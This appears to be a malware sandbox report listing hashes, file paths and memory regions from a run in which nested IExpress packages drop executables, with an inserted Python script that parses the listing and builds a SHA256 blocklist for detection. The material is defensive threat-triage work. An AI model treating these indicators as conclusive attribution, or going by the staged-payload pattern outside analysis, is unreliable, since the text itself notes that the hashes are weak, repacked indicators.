MD5 0fdb6a5eed8f495690a8109a929c6ab9
SHA1 9cc62b552dfe2439505a02820c3eb6c82e5d2da0
SHA256 0f69238338eaac37c2337de2d99faf8b1473503dc4b8e33b7548cf7e56a3d7e4
SHA512 60329da294d1fee6b3d4586c8313d7d322e63b58d06cd46ea5e3e819f64fb2eb33a58986a11ef17ef6e987599e0e9b128228d68df24163156ef2d8096b2f1e4a

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

MD5 7a0174c379430b45dc3fdfcf9427b62e
SHA1 ee026bbf56bf21ebfc1ed9a0aa49a30417a22418
SHA256 ce189338786d504bc37b8ff3e82879cc0fb98bb7d42ba36e60d4c45caa8047a4
SHA512 129ff1eacff3b7c093dc2d164aaec655409b7c4bbadb452f491bd930059c32f0cae664df745f561aea3be12f1074c33a9a175be17b259aee4cdf15122cabb496

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

MD5 202c6d08618821679870b09397b327d4
SHA1 95825d16b996f7ecd314ac66d68a7e166eb79b1e
SHA256 6cf0733f28bcebd3e25d33cc117773633a70241665ef8774fa42201161091bb9
SHA512 2eec22005e9d9fd31374ee153b4adb3b47cdac1c08fae3a28b127fbcb2060b708392fa4e9326a80126c3633392dcd6f048d067787d6e2d792d08a3c745c01318

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA

MD5 ac89a852c2aaa3d389b2d2dd312ad367
SHA1 8f421dd6493c61dbda6b839e2debb7b50a20c930
SHA256 0b720e19270c672f9b6e0ec40b468ac49376807de08a814573fe038779534f45
SHA512 c6a88f33688cc0c287f04005e07d5b5e4a8721d204aa429f93ade2a56aeb86e05d89a8f7a44c1e93359a185a4c5f418240c6cdbc5a21314226681c744cf37f36

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA

MD5 ca772edf6336b272c2d237d6a3229176
SHA1 8a244a2e1ccf865dc96c348f20569680c136ed8a
SHA256 4097e2f4678ef07602b79303a493232254b7be6fd1db009c700dc646cba11c30
SHA512 d39e878a404f2fe1ef8c31c03b5ad99416d119346040f7893881678bd61a055c2c2d1c10c0b1b5e8524d22219fdae48da0e49cbe60ac87edc58dbdefb20adb33

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\MetaData\EDC238BFF48A31D55A97E1E93892934B_C31B2498754E340573F1336DE607D619

MD5 b9257953b9d58844a434f1164987b4d4
SHA1 96c67b582ea763ef4af431315d7fc5a003daae6e
SHA256 07a6d9a6ec7f890603c209e51f7b8a6b19036525ddc7fd837b84ceca1320c6ad
SHA512 5287d6638cc7654a8c2a2bd31ecafde1d583a674895b4eaa857c390ed532f6cddc0772da14fb88346d9414b491d4ec8af5f413a1204d58da5883ff4b78c37c40

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\Content\EDC238BFF48A31D55A97E1E93892934B_C31B2498754E340573F1336DE607D619

MD5 80144ac74f3b6f6d6a75269bdc5d5a60
SHA1 6707bb0c8a3e92d1fd4765e10781535433036196
SHA256 d746128fdb817742cb812c74fb8aa543191116feda6dfcfc59d74becf482a285
SHA512 c61d3847bdc0c4a4b8cd94b2d9a3a474b985b974776ca2ef4caf78e5fb82e4d4f65c477dec1cdf080f9d397f3d0dfe035adc267f9b4fe9b75c82e399f20bc6b3

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\MetaData\F2DDCD2B5F37625B82E81F4976CEE400_57CE1AECC398AD2C94DD1A683EAD09FC

MD5 461a9a177b871f12dbe38b2eacd74ca2
SHA1 0977c422294cab8fda4b9376324fe72e45fd11d7
SHA256 88efd9e57a0e0ce2143b9b47407d6a18bbaa5ad39f77b770093534a3eb8f4dde
SHA512 ef49403ade4424307906eb6095b578f3dbc65713b40a49182df879754aa332bca95f65e85834cd5178da150d112b7af4373c5f4af4f600325d787d67d1c6c9cb

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\Content\F2DDCD2B5F37625B82E81F4976CEE400_57CE1AECC398AD2C94DD1A683EAD09FC

MD5 df26803bd741cd8337ebbee4c99100c7
SHA1 0c773c5482f47ed25356739cfae0e0d1f1655d73
SHA256 fd20571a9005f781b6452d345b8ea3e90c9cc88156795a3521cc16fae542355e
SHA512 6648aa7a8c307467e3174b50928aa19aa133f42a87b6332ef02aad85fe1b48b848145daba50ef220eb075699268547eb7a731874cdb197d89cd229f4cc962886

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\MetaData\F2DDCD2B5F37625B82E81F4976CEE400_57CE1AECC398AD2C94DD1A683EAD09FC

MD5 b4aed901cdd783564bbde9863377a94a
SHA1 10b23c7a6d463ce2785f9b7faf570db8810ab097
SHA256 5d822d5e41155eae748161e82269f5fda8ea6d6db30b81e8890f39bb1ddbf33e
SHA512 c07cbb206c731d0bc594942898ca43331545d6ead943b8ac54378418dc2b5fc13b25717b9314ebd7798d091bdf6f9b14373a897fb7cd35121bfa6a7ae244b1c1

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cookies\3YBSUIJX.cookie

MD5 a1d919c6432b08b59a1759e37fe059ca
SHA1 38adc3a440f640bb8c5a85806c678985e83e83e5
SHA256 ea916674ea234ea82a29c196c8eee76a753de4efecc20b3f0aef473ff701c542
SHA512 d00ec4b99ef8ee3b50a7a7bc13d3ee70e54ceed7db081fa9c00d7fc59e6485a9d650cb367042556bc4f8ad584720dbe9438f4efbb79b201c033a2c586b784638

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cookies\75Q97OIK.cookie

MD5 4234f36b109ffc79afe749f75e9ef12d
SHA1 b4db0f2823fc2a0adae497cfa7b8fbda0402515f
SHA256 fdb879e24433e430d546bbc894306379194e27476d6a22fcd7059c17ea37bbe4
SHA512 d4c4cf80d70fa3efa3f7ce2e111fab998035efa02f066fc4636e30cbb713bf3fc452dda75730c00f27c1d8158f8606e9022616e78835eb0087c02ef288c4a6db

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27

MD5 bbf0e29268ddfd99bde03e58039df96a
SHA1 3ba0542fed7734b1fcb484d73df8583d4c1cb11d
SHA256 ccb67510824670f69ce2ed17ba72455f2be26d053ab13b2d04e8c4bbc2a456a4
SHA512 4eac0c845359016b7045100c146d83b3c5e94ca7d319e4bcde9c19f880b89d33630aadbfbeb21c85295388826e046857aafba5b55fd22397537761586af0df35

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27

MD5 2c4e59606fdcc3c4dd6f2630ff8ea90c
SHA1 2271e90dec03cae15daa5620274aebe650e1a519
SHA256 b1aefacdeb313694c46b4bfbb6aa6a5703eb5f5b609d8b19326a19b0ded82fd9
SHA512 3600e8aaa198e426addfd258c5ea0978fd095f4abd7d160b2ef2063f37ef47da4f23cb2399db42f1b37968c9a0750aa1fe1b3480b66fd9d40286c5ad661b1667

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cookies\2NEMWU8A.cookie

MD5 6c48d051d224024c579e69f7d6a965b1
SHA1 4f13ecb3ed4340a4b3fc938925de1a12aaf0e148
SHA256 01371fe1f13a53b1949d09571677955d2a3f65469d5601580f66178a059afead
SHA512 734f4fd2d31911bf2498756e0b3b543461875036b4560e10707ce820549b9e5f3de2fe383ac57327741e89c3fe17ed777c75b8a41368a4ed6243a0525e3a120b

memory/3060-196-0x0000021AF1720000-0x0000021AF1722000-memory.dmp

memory/3060-202-0x0000021AF1750000-0x0000021AF1752000-memory.dmp

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA

MD5 62f34bf7b84a956a7118a62ff924c43d
SHA1 48968426cbeb7104594800eebda2b61520715b5c
SHA256 8feb715a91b6dad5f0f21471b7caeafaa72be7a658a01393a05f79a2512946bd
SHA512 380ec29a6a245d2dc6a73a05b71b2aeac1edd37574cc17e28de98e1754ea2b3230b93e55b225d9a093f54f88e8fff3570c1e51f7362d545b7d6b182f8dc20367

C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\CFDSNEYV\shared_global[1].css

MD5 cfe7fa6a2ad194f507186543399b1e39
SHA1 48668b5c4656127dbd62b8b16aa763029128a90c
SHA256 723131aba2cf0edd34a29d63af1d7b4ff515b9a3a3e164b2493026132dd37909
SHA512 5c85bb6404d5be1871b0b2e2d2c9053716354acd69c7acca73d8ce8bf8f21645ae11f788f78ef624444016cb722ecbd6213e771bda36717725f2b60f53688c6b

C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\26P8CEQS\buttons[1].css

MD5 84524a43a1d5ec8293a89bb6999e2f70
SHA1 ea924893c61b252ce6cdb36cdefae34475d4078c
SHA256 8163d25cb71da281079b36fcde6d9f6846ff1e9d70112bbe328cae5ffb05f2bc
SHA512 2bf17794d327b4a9bdbae446dd086354b6b98ac044a8ee0b85bd72c3ab22d93b43f3542df03d64f997d1df6fc6cac5c5e258c4ec82b998f3a40b50c2fde99b5a

memory/3264-306-0x00000000029A0000-0x00000000029B6000-memory.dmp

memory/3940-307-0x0000000000400000-0x000000000040B000-memory.dmp

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cookies\WAG0XCXD.cookie

MD5 f839b36539d02672be485fba49921621
SHA1 586908d33f64e14ac4c9be72012104c371913656
SHA256 47adeb4cf1a850b307e76b865732122cf43d1f9173370d6814f840b884cd7f53
SHA512 72f39d42b2ad45f20d27b3f981a1f6471e9547e6813874abd7a59207e1e221a683255dbbfc4151d469f1818c9ec60bc5055942cbdacee7a5eba28cd01dd0fadb

C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\L8011MP6\shared_responsive[1].css

MD5 086f049ba7be3b3ab7551f792e4cbce1
SHA1 292c885b0515d7f2f96615284a7c1a4b8a48294a
SHA256 b38fc1074ef68863c2841111b9e20d98ea0305c1e39308dc7ad3a6f3fd39117a
SHA512 645f23b5598d0c38286c2a68268cb0bc60db9f6de7620297f94ba14afe218d18359d124ebb1518d31cd8960baed7870af8fd6960902b1c9496d945247fbb2d78

memory/2676-413-0x00000204F1750000-0x00000204F1751000-memory.dmp

memory/2676-414-0x00000204F1760000-0x00000204F1761000-memory.dmp

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cookies\A20IKOM3.cookie

MD5 bf8c677582aebb5c6a2f157da6666ed4
SHA1 8c845a04f038c15bc4b4c72deaf659cfd6f7f671
SHA256 8d64e6e9a9a71dac7eafd1975a862277342596480a644c2e0173204d86864073
SHA512 2c5ea5434246b3cfa4b0e92dfe4525222e301075c66df200337156254e6f9ff47718ba5d7f6586434e45f3ea74ed2cd6435fe419a5d191e698980987102dd9e7

memory/960-425-0x0000025B9D800000-0x0000025B9D900000-memory.dmp

C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\L8011MP6\tooltip[1].js

MD5 72938851e7c2ef7b63299eba0c6752cb
SHA1 b75196bd3a6f9f4dfc1bbf5e43e96874bcd9ce4e
SHA256 e2d4e0e1d3e162fdc815f16dfff9ae9b0a967949f0f3ae371f947d730a3f0661
SHA512 2bb6c03a1335ef9514d0d172a4284d82a29d1783a72306bdcb8af3185d5cd2ff16303355aa4b05086d2fa0b5b7c7159cfa67de4a6175095ff0e68adec2a56ac1

C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\L8011MP6\shared_global[1].js

MD5 f94199f679db999550a5771140bfad4b
SHA1 10e3647f07ef0b90e64e1863dd8e45976ba160c0
SHA256 26c013d87a0650ece1f28cdc42d7995ad1a57e5681e30c4fd1c3010d995b7548
SHA512 66aef2dda0d8b76b68fd4a90c0c8332d98fe6d23590954a20317b0129a39feb9cd3bd44e0c57e6b309227d912c6c07b399302a5e680615e05269769b7e750036

memory/216-444-0x0000019AC2050000-0x0000019AC2070000-memory.dmp

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cookies\50E7MVBI.cookie

MD5 90b2bedc4cafb5a46883aaa53570c511
SHA1 ed153d69d9a757249ec45168b421b4e7d7d88c74
SHA256 ef84855cb8e5dab16486a30552c73f27bf63fd875651f91d7ab1697c374e9bc3
SHA512 886ecc1eea5118144702da975b3bb7056a81609503f1d4a599fdbdfb36b9e9aad4a6e8a7dca9d94ef82a7b0c8990c0b2a4b5a12debe4af779cb5b269a15bec5b

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\8sm756gN.exe

MD5 e84b7f018c2dc3d6fc4a9ce9367d11f0
SHA1 e4111ca70158f0ad4aa36f5938eee76ab13ced5d
SHA256 dfd0928c3b3a806ce46c17c5e0fc3c5f9a6fa7ec78396b7636546c2e2ae557c5
SHA512 e2c460cf0fdcba09d603a237b7501540ec2117baf414a47828a236c679a15473b53e2588f500ed12929d7421ca37ea589086a6582b7ddf71b3127404a8dd4a83

memory/5968-460-0x0000000000400000-0x000000000043C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\9dc5kt9.exe

MD5 eee731191c8b0d40c238da64ea6825a9
SHA1 8be417929013cc3572aae6195e6aecc8840e60c6
SHA256 9a3a93ec3e35992d48e0bf5fd114c3393dbfe38f421c141d2b59617fd864af7e
SHA512 8f06e72c80b9879f33eafe00fdcc9395662a601783c9066505f09dec5e49e1853d6b922752fb5415263f4351f5dd87f4665bc77aa084a4628286be22848beaef
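
The listing above is a flat dump in which the same entry recurs verbatim while genuinely different versions of one cache file sit under the same path, and the payloads that matter (the executables under IXP000.TMP to IXP003.TMP, the temp directories IExpress self-extracting packages unpack into, here nested four deep) are mixed in with Edge cache and cookie noise. The Python below is an added example, not part of the sandbox report: it parses this listing format, collapses verbatim repeats while keeping distinct hash versions, picks out the IExpress-staged executables, and matches file contents against the listed SHA256 values. The SAMPLE excerpt is constructed from entries on this page with the SHA1 and SHA512 lines omitted; the function names are mine.

```python
"""Added example (not part of the sandbox report): parse the dropped-file
listing above, collapse verbatim repeats, isolate the IExpress-staged
payloads and match file contents against the listed SHA256 values."""
import hashlib
import re
from collections import OrderedDict
from pathlib import Path

# One hash line of the listing, e.g. "SHA256 <hex>".
HASH_RE = re.compile(r"^(MD5|SHA1|SHA256|SHA512)\s+([0-9a-fA-F]+)$")
# IExpress self-extracting packages unpack into %TEMP%\IXP###.TMP; the
# IXP000..IXP003 directories in this run are four nested SFX layers.
IXP_RE = re.compile(r"\\IXP\d{3}\.TMP\\[^\\]+\.exe$", re.IGNORECASE)

# Constructed excerpt of the listing above (SHA1/SHA512 lines omitted for
# brevity; the parser accepts them): one dropped PE repeated verbatim, a
# memory-dump line, a second dropped PE, and two different versions of
# the same CryptnetUrlCache metadata file.
SAMPLE = r"""
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\WB0gv59.exe

MD5 ec9347db8088e2aad2304dd6027992df
SHA256 5b711bca861f09e06fc477b38545e40f4ba0f725350fa0ae103927a80ac92a5b

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\WB0gv59.exe

MD5 ec9347db8088e2aad2304dd6027992df
SHA256 5b711bca861f09e06fc477b38545e40f4ba0f725350fa0ae103927a80ac92a5b

memory/2676-28-0x00000204EA420000-0x00000204EA430000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1SM46dE0.exe

MD5 b65976f1a9f65a1633702e9818ca5a6c
SHA256 3226bad2e200895caec2327de882e5cde340f296f7e6718f80fe328b57479495

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

MD5 05cf8989d7549aff8355e8e65aca6d68
SHA256 cd2dad3e04685a553beaffe71a39bf9dcce0a70dc6d75d87e93bce04b1326b13

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

MD5 39653f9fda1b60a58d8205d8ecdaeb8c
SHA256 cb632c2c465df09bc48f451c6f5d18a26e95c35e003131ba2e9315c16d4ca528
"""

def parse_listing(text):
    """Return unique (path, hashes) records in first-seen order. The same
    path (case-insensitive, as on NTFS) with the same SHA256 is collapsed;
    the same path with a different SHA256 is a new version and is kept."""
    records = OrderedDict()
    path, hashes = None, {}

    def flush():
        if path is not None and "SHA256" in hashes:
            records.setdefault((path.lower(), hashes["SHA256"]), (path, dict(hashes)))

    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        m = HASH_RE.match(line)
        if m:
            hashes[m.group(1)] = m.group(2).lower()
        else:  # a path or memory-dump line opens a new entry
            flush()
            path, hashes = line, {}
    flush()
    return list(records.values())

def dropped_executables(records):
    """Payloads written under an IExpress IXP###.TMP staging directory."""
    return [(p, h) for p, h in records if IXP_RE.search(p)]

def sha256_blocklist(records):
    return {h["SHA256"] for _, h in records}

def sha256_hex(data):
    return hashlib.sha256(data).hexdigest()

def match_blobs(blobs, blocklist):
    """blobs: iterable of (label, bytes). Returns (label, sha256) per hit."""
    hits = []
    for label, data in blobs:
        digest = sha256_hex(data)
        if digest in blocklist:
            hits.append((label, digest))
    return hits

def sweep_directory(root, blocklist):
    """Hash every regular file under root and report those on the blocklist."""
    files = ((str(f), f.read_bytes()) for f in Path(root).rglob("*") if f.is_file())
    return match_blobs(files, blocklist)

if __name__ == "__main__":
    recs = parse_listing(SAMPLE)
    for p, h in dropped_executables(recs):
        print("dropped PE", h["SHA256"], p)
```

On a triage image, `sweep_directory(root, sha256_blocklist(parse_listing(report_text)))` finds on-disk copies of anything listed here. Treat the hashes as a weak indicator: loader chains like this one are repacked per campaign, so the durable signal is the shape of the activity, a user-mode process writing and executing PEs out of nested %TEMP%\IXP###.TMP directories, rather than any one digest.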

C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\IJSASETU\shared_responsive_adapter[1].js

MD5 a52bc800ab6e9df5a05a5153eea29ffb
SHA1 8661643fcbc7498dd7317d100ec62d1c1c6886ff
SHA256 57cfaf9b92c98541f769090cd0229a30013cea7cfafc18519ca654bfae29e14e
SHA512 1bcacd0ec7c3d633d6296fff3325802d6352805f0d2cf1eea39237424229ecffad6cb2aee4248e28b1eca02ff0646b58240851a246bbcf0aa1083830d5d9081e

C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\Cache\S2XMKKQ4\favicon[1].ico

MD5 630d203cdeba06df4c0e289c8c8094f6
SHA1 eee14e8a36b0512c12ba26c0516b4553618dea36
SHA256 bbce71345828a27c5572637dbe88a3dd1e065266066600c8a841985588bf2902
SHA512 09f4e204960f4717848bf970ac4305f10201115e45dd5fe0196a6346628f0011e7bc17d73ec946b68731a5e179108fd39958cecf41125f44094f63fe5f2aeb2c

memory/5968-528-0x0000000073050000-0x000000007373E000-memory.dmp

memory/6292-532-0x0000000000400000-0x0000000000488000-memory.dmp

memory/6292-535-0x0000000000400000-0x0000000000488000-memory.dmp

memory/5968-540-0x000000000BF60000-0x000000000C45E000-memory.dmp

memory/6292-541-0x0000000000400000-0x0000000000488000-memory.dmp

memory/6292-534-0x0000000000400000-0x0000000000488000-memory.dmp

memory/5968-554-0x000000000BB40000-0x000000000BBD2000-memory.dmp

memory/5968-593-0x000000000BAE0000-0x000000000BAEA000-memory.dmp

memory/1984-635-0x00000274FA3A0000-0x00000274FA3C0000-memory.dmp

memory/1984-638-0x00000274E9B00000-0x00000274E9C00000-memory.dmp

memory/960-668-0x0000025BB1840000-0x0000025BB1860000-memory.dmp

memory/960-686-0x0000025BAF490000-0x0000025BAF4B0000-memory.dmp

memory/216-685-0x0000019AC3760000-0x0000019AC3780000-memory.dmp

memory/5300-687-0x0000023F76A00000-0x0000023F76A20000-memory.dmp

memory/5968-704-0x000000000CA70000-0x000000000D076000-memory.dmp

memory/5968-714-0x000000000BE20000-0x000000000BF2A000-memory.dmp

memory/648-720-0x000002507BE40000-0x000002507BE60000-memory.dmp

memory/5968-717-0x000000000BD40000-0x000000000BD52000-memory.dmp

memory/5300-732-0x0000023F76A80000-0x0000023F76AA0000-memory.dmp

memory/5968-773-0x000000000BDA0000-0x000000000BDDE000-memory.dmp

memory/752-769-0x00000165F0F20000-0x00000165F0F40000-memory.dmp

memory/960-805-0x0000025BAFC00000-0x0000025BAFD00000-memory.dmp

memory/216-808-0x0000019AC3F00000-0x0000019AC4000000-memory.dmp

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cookies\OGDRV5I8.cookie

MD5 abff24550c1d95ef0c543fc93e8ffcb1
SHA1 e808eaf966386a973a3e38bc4eb570d1672e4fc0
SHA256 56b28e34c483a2172d8e8a0f764a423cb7f27aa2a6a59c0d55eaaf548bc9292f
SHA512 309eca9a397daeff08d72d464301502cc77e9c2e35d0caced5abfb6a3ca33ca48cf324dcb3cb679a84f7735a14c681ca24819f05d97f6c7be76623976baa86a6

C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\Cache\S2XMKKQ4\B8BxsscfVBr[1].ico

MD5 e508eca3eafcc1fc2d7f19bafb29e06b
SHA1 a62fc3c2a027870d99aedc241e7d5babba9a891f
SHA256 e6d1d77403cd9f14fd2377d07e84350cfe768e3353e402bf42ebdc8593a58c9a
SHA512 49e3f31fd73e52ba274db9c7d306cc188e09c3ae683827f420fbb17534d197a503460e7ec2f1af46065f8d0b33f37400659bfa2ae165e502f97a8150e184a38c

C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\Cache\S6QQMHFC\favicon[2].ico

MD5 231913fdebabcbe65f4b0052372bde56
SHA1 553909d080e4f210b64dc73292f3a111d5a0781f
SHA256 9f890a9debcdfccc339149a7943be9aff9e4c9203c2fa37d5671a5b2c88503ad
SHA512 7b11b709968c5a52b9b60189fb534f5df56912417243820e9d1c00c97f4bd6d0835f2cdf574d0c36ecb32dbbf5fc397324df54f7fdf9e1b062b5dbda2c02e919

C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\User\Default\DOMStore\1A3VB725\www.epicgames[1].xml

MD5 c1ddea3ef6bbef3e7060a1a9ad89e4c5
SHA1 35e3224fcbd3e1af306f2b6a2c6bbea9b0867966
SHA256 b71e4d17274636b97179ba2d97c742735b6510eb54f22893d3a2daff2ceb28db
SHA512 6be8cec7c862afae5b37aa32dc5bb45912881a3276606da41bf808a4ef92c318b355e616bf45a257b995520d72b7c08752c0be445dceade5cf79f73480910fed

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cookies\60UQARMT.cookie

MD5 61c50ee38c6d632465113daff7714b1b
SHA1 93e944c83d056d7a07f2aa3a00867562231e643f
SHA256 059b483e2968a6a9fa4c8509589e53bcf5b1d501a13c3525f83f566c62ec3262
SHA512 c45b99cb9156a0ebf07818ae02b01f61e21024c9f2204dd87fa13e013a2ea3adf25a0e831e3e4010295affad7902865644c25add122c94482a7faebafc5fa600

memory/5968-999-0x000000000C460000-0x000000000C4AB000-memory.dmp

C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\Cache\OANWFX4C\pp_favicon_x[1].ico

MD5 e1528b5176081f0ed963ec8397bc8fd3
SHA1 ff60afd001e924511e9b6f12c57b6bf26821fc1e
SHA256 1690c4e20869c3763b7fc111e2f94035b0a7ee830311dd680ac91421daad3667
SHA512 acf71864e2844907752901eeeaf5c5648d9f6acf3b73a2fb91e580bee67a04ffe83bc2c984a9464732123bc43a3594007691653271ba94f95f7e1179f4146212

C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\ImageStore\fbueszc\imagestore.dat

MD5 d0588b0a7839eb3da63fca813568fb9d
SHA1 6356bc9468e00cb81800bcb939bc24d0f668604a
SHA256 80547e8666415a8cebc9aa42b554c3941eaf2afcae977d845499b9e855420541
SHA512 88a6bb387e88aec034d8059eebe6033200b12143d976acf65cc97d8c2026a81155ebf347543475304cf01ddbd1d7e6439786d38569a137ba2f79fbd9f754b26f

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cookies\JR9BHDUR.cookie

MD5 298c0073c201e933ade089086840389d
SHA1 a5be81f5c47713ed3386faa0eabff9a7db51b35f
SHA256 43b090624e99c06bbdd115123d4a232b8dce8a9a9b63d873b0d38835a8a1c383
SHA512 ead033d5241bfda34ffc1a9121906c0a132e5473955c5324b8d62191e4b56e7cefe53545fb205f32e0725d12973afd5eb76eb38858603099a0ed49e0884283ab

C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\CFDSNEYV\chunk~9229560c0[1].css

MD5 19a9c503e4f9eabd0eafd6773ab082c0
SHA1 d9b0ca3905ab9a0f9ea976d32a00abb7935d9913
SHA256 7ba0cc7d66172829eef8ff773c1e9c6e2fde3cfd82d9a89e1a71751957e47b0a
SHA512 0145582e8eb3adb98ad2dbc0b8e7a29c1d0525f0fd515fcf82eda7b4ce2f7f7f6aa0e81912aa98927e6d420ed110eb497c287a0ad483f8af067332920d4bde83

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cookies\544VJ9NI.cookie

MD5 cfa717a6ce4be7556d0ea9a64c6859f2
SHA1 4a9cd4dbbffc5658777d77f95c9d20e03e20966c
SHA256 e19aefc7981cbf0d626099a1dcb5e90085f9c8fa8ca3d1aa1916688ad10b1f79
SHA512 537fba4194905ee3daadc936565305facfd8858dd50fa6fb84ea52cd3be34dd36cc8dab03c47b04f3424d9c4bad22de9890e5e8a4d6aa974ac3b38f90b2a0e71

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cookies\WX1823CX.cookie

MD5 633739985ed879f33303ca1e56cd53c9
SHA1 bb017d462234e92c4373bbb12f0713d4081e76fe
SHA256 570c76c2e4cdccc166576e845066a6413d91ee75113e82072075f2e3c4e23c30
SHA512 0f90e03566cf5cdfd78f9ea176f2be56b70b834eca7442ddc10044cea07ec35175c85694c7987f2e0dd9fbb04c901809030cccd3bbe8a44195349dfde6063c8d

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cookies\DMT4189R.cookie

MD5 43b7f5d5f2efd92d72c8ab43bae9e3ed
SHA1 acc2d3f695cb82494c3bf3e04c47ae735fe77273
SHA256 eec6111c657f493e9e55b7e915016b60b815c1f711b10381a2451a7b51f9532a
SHA512 624f87718078e09686c023221af52269dcd1d4a2259ec8d766c93e6b6090e2fe280ba54884f4826a9a1d8bb9e2230ffdb381be028298835ffb94485e7ce7356b

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cookies\XL2U6HY9.cookie

MD5 7c2e04bfc35ec82afee56b5f05243e3a
SHA1 9ea296a5c9ab69cfddd9c3449449e382c1eeb5ce
